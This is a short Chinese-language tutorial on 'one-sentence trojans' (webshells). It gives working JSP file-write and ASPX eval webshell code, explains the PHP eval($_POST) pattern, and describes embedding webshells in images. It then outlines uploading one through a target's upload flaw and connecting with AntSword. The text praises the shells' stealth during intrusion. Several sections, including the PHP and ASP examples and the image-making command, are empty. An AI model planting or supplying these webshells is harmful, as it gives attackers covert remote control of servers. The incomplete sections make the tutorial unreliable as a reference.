一句话木马学习篇

一、常用的一句话

PHP格式

ASP格式

JSP格式
<%
if(request.getParameter(“f”)!=null)(new java.io.FileOutputStream(application.getRealPath("")+request.getParameter(“f”))).write(request.getParameter(“t”).getBytes());
%>
ASPX格式
<%@ Page Language=“Jscript”%> <%eval(Request.Item[“pass”],“unsafe”);%>

二、作用

以PHP格式的一句话为实例：

:代码写在这里面才会被服务器认为是php代码，然后才会按php的格式解析

@：这个符号的意思是不报错，即便是这里面的代码执行出错也不会报错，如果没有这个符号一旦语句有错误就会使用不了
eval()函数：把函数里面的字符串作为PHP代码执行
$_POST[]:意思就是在这个中括号里面的内容使用POST的方法进行接收，在PHP里面不仅有POST还有GET、REQUSET等

三、特点

短小精悍、功能强大、隐蔽性非常好、在入侵的时候发挥着强大的支持

四、图片一句话

图片一句话就是把一句话木马插入到图片中，把他当做一句话木马进行使用

五、图片一句话制作

使用命令行制作：

使用软件制作：
这里使用的是edjpgcom软件

六、一句话木马使用演示

这里使用靶机的上传漏洞进行演示：

这里使用的连接软件是中国蚁剑：
现在添加一个连接：
右键点击ADD输入shell的地址和密码
这样就可以连上了